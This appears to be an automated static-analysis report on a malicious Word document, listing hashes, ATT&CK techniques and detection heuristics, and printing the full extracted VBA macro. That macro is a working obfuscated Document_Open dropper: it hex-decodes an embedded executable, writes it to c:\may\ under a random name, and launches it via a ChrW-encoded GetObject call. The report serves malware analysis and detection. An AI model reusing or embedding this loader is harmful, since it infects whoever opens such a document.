Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0c46b98d7a5dab0c…

MALICIOUS

Office (OOXML)

Size: 301.6 KB
Created: 2020-05-11 15:09:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2020-07-24
MD5: 31ea7eecb1357707dc1921ae47c154e0
SHA-1: 64e22821efd17266b6f0cd2a81c268c841f58d63
SHA-256: 0c46b98d7a5dab0cb22c75e6c5f3853b63f7cdfd9a881dd342911fb7f829566c
Risk score: 262

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1071.001 Web Protocols
  • T1105 Ingress Tool Transfer

The sample contains a malicious VBA macro that executes when the document is opened. The macro is obfuscated: it decodes a hex-encoded executable and writes it to disk in the 'c:\may\' directory under a random file name with a '.exe' extension. The written executable is then opened through a GetObject COM instantiation, indicating dropper functionality.

Heuristics 7

  • ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.HexEncodedEXEHeader-9789587-1
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape — In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1920 bytes
SHA-256: 8823726413b62b459df09e4dd2d19a913bf3c27d43ca26badd6326d21362370c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DocumentosTittle"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CheckBox1, 0, 0, MSForms, CheckBox"

Private Sub Document_Open()
Dim i, d
Dim strTemp$, strReturn$, hextostr$
Dim Splits$(), CurFolder$
Dim GenerateFileName$, sFile$, sValues$

Splits$ = Split("c:\may", "\")
For i = LBound(Splits) To UBound(Splits)
CurFolder = CurFolder + Splits(i) + "\"
If Dir(CurFolder, vbDirectory) = "" Then MkDir CurFolder
Next i

hextostr = DocumentosTittle.CheckBox1.Caption

For i = 1 To Len(hextostr) Step 2
strTemp = Chr(Val("&H" + Mid(hextostr, i, 2)))
strReturn = strReturn + strTemp
Next i
hextostr = Right(strReturn, Len(strReturn) - 1)
    
    Randomize
    sValues = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    sValues = sValues & UCase(sValues) & ""
    For i = 1 To Val("7")
        GenerateFileName = GenerateFileName & Mid(sValues, Int(Rnd() * Len(sValues) + 1), 1)
    Next i
    sFile = GenerateFileName

    d = Chr$(99) + Chr$(58) + Chr$(92) + Chr$(109) + Chr$(97) + Chr$(121) + Chr$(92) + sFile + Chr$(46) + Chr$(101) + Chr$(120) + Chr$(101)
    
Open d For Binary As #1
Put #1, , Chr$(77) + hextostr + sFile
Close #1

Dim obj3
Set obj3 = GetObject(ChrW(110) + ChrW(101) + ChrW(119) + ChrW(58) + ChrW(49) + ChrW(51) + ChrW(55) + ChrW(48) _
 + ChrW(57) + ChrW(54) + ChrW(50) + ChrW(48) + ChrW(45) + ChrW(67) + ChrW(50) + ChrW(55) + ChrW(57) _
 + ChrW(45) + ChrW(49) + ChrW(49) + ChrW(67) + ChrW(69) + ChrW(45) + ChrW(65) + ChrW(52) + ChrW(57) _
 + ChrW(69) + ChrW(45) + ChrW(52) + ChrW(52) + ChrW(52) + ChrW(53) + ChrW(53) + ChrW(51) + ChrW(53) _
 + ChrW(52) + ChrW(48) + ChrW(48) + ChrW(48) + ChrW(48))
obj3.Open d
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 15872 bytes
SHA-256: 7d8e51695f3f776eed1bbd8591fcf88bf2249ebd4084d2818462570106328237